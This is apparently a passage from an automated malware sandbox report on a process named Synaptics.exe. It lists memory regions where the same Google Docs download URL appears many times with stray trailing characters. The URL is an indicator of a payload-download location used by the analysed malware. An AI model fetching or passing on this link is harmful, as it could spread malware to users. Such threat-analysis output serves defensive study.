                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.000000000082E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0(
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0d
                                Source: Synaptics.exe, 00000008.00000002.3127199447.0000000049B7E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0w
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026291010.00000000075FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                                Source: Synaptics.exe, 00000008.00000002.3060948021.0000000029DFE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1w
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3.
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download30
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4S4
                                Source: Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3025439050.000000001E142000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5Ob
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5f
                                Source: Synaptics.exe, 00000008.00000003.2026465506.000000000085F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.1985815535.0000000000857000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000085B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                                Source: Synaptics.exe, 00000008.00000002.3064522776.000000002C37E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6w
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7-
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7141v
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download77
                                Source: Synaptics.exe, 00000008.00000002.3002241357.0000000011D3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8Q
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                                Source: Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9x
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;)
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;3
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;6
                                Source: Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=d
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052B0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?(
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?2
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?5
                                Source: Synaptics.exe, 00000008.00000002.3131613631.000000004C23E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?w
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.0000000007663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2992205633.000000000F0B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAPPKB
                                Source: Synaptics.exe, 00000008.00000003.2026465506.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000003.2026465506.0000000000841000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3028287067.000000001E232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBuluF
                                Source: Synaptics.exe, 00000008.00000002.2996469826.000000000F268000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3037734869.000000001E6AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.0000000005385000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC(
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC2
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC5
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadConne
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCoule
                                Source: Synaptics.exe, 00000008.00000002.3037494502.000000001E67E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2970209695.00000000052DC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3023051475.000000001E000000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3104595934.000000003DC36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2991135395.000000000F014000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3029665397.000000001E302000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2963458232.000000000080C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3030599006.000000001E35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                                Source: Synaptics.exe, 00000008.00000002.2963458232.00000000007F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD3H3
                                Source: Synaptics.exe, 00000008.00000002.2963458232.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDN
                                Source: Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDNEQB
                                Source: Synaptics.exe, 00000008.00000002.3026948885.000000001E1AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDd
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDene
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDeneU
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2977437745.00000000075A9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000008.00000002.2996806587.000000000F2F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenet#
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenetK
                                Source: Synaptics.exe, 00000008.00000002.3036094790.000000001E5AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenetM
                                Source: Synaptics.exe, 00000008.00000002.3098639920.000000003DA24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDenetj
                                Source: Synaptics.exe, 00000008.00000002.2993630740.000000000F15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDesk
                                Source: Synaptics.exe, 00000008.00000002.3067917782.000000002E9BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDw
